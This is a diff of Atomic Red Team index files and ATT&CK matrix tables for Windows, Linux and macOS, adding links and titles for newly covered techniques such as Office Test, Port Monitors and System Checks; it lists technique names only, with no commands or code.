-- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
+  - Atomic Test #1: Office Apllication Startup Test Persistence [windows]
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -475,7 +488,8 @@
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
   - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
+  - Atomic Test #1: Add Port Monitor persistence in Registry [windows]
 - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
   - Atomic Test #1: Append malicious start-process cmdlet [windows]
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -636,12 +650,13 @@
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
-  - Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
-  - Atomic Test #5: Security Software Discovery - AV Discovery via WMI [windows]
+  - Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
+  - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
   - Atomic Test #1: System Information Discovery [windows]
   - Atomic Test #6: Hostname Discovery (Windows) [windows]
@@ -775,7 +790,8 @@
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1113 Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+  - Atomic Test #5: Windows Screencapture [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Matrices/linux-matrix.md

@@ -22,14 +22,14 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  |  | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Screen Capture](../../T1113/T1113.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) |  | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) |  |
-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Indicator Blocking](../../T1562.006/T1562.006.md) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -60,7 +60,7 @@
 |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) |  |  |  |  |  |  |  |
-|  |  |  |  | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [System Checks](../../T1497.001/T1497.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Timestomp](../../T1070.006/T1070.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/macos-matrix.md

@@ -19,7 +19,7 @@
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) |  | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  |  | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  |  |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -55,7 +55,7 @@
 |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) |  |  |  |  |  |  |  |
-|  |  |  |  | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [System Checks](../../T1497.001/T1497.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Timestomp](../../T1070.006/T1070.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/matrix.md

@@ -26,12 +26,12 @@
 |  | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
+|  | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | [Remote Access Software](../../T1219/T1219.md) |  |
@@ -55,10 +55,10 @@
 |  |  | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
+|  |  | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
-|  |  | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) |  |  |  |  |  |  |  |
+|  |  | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) |  |  |  |  |  |  |  |
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  |  |  |
 |  |  | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) |  |  |  |  |  |  |  |
 |  |  | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -68,7 +68,7 @@
 |  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
